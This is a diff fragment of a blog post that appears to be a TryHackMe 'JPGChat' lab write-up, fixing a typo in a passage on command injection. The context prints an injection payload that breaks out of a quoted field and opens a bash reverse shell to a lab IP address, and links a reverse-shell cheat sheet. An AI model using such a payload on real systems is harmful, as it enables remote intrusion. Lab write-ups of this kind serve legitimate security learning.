JacenBoy/jacenboy.github.io/_posts/2021-08-17-tryhackme-jpgchat.md

 wes
 ```

-Our `whoami` command gives us a username back, meaning we do indeed have sucessful command injection.
+Our `whoami` command gives us a username back, meaning we do indeed have successful command injection.
 Now we can build out a reverse shell to get proper access to the box.
 If you've never built a reverse shell before, there are [plenty of online resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) to help you out.
 Below is one of the more basic and common bash reverse shells.

 ```
 '; bash -c 'bash -i >& /dev/tcp/10.13.14.52/9001 0>&1'; #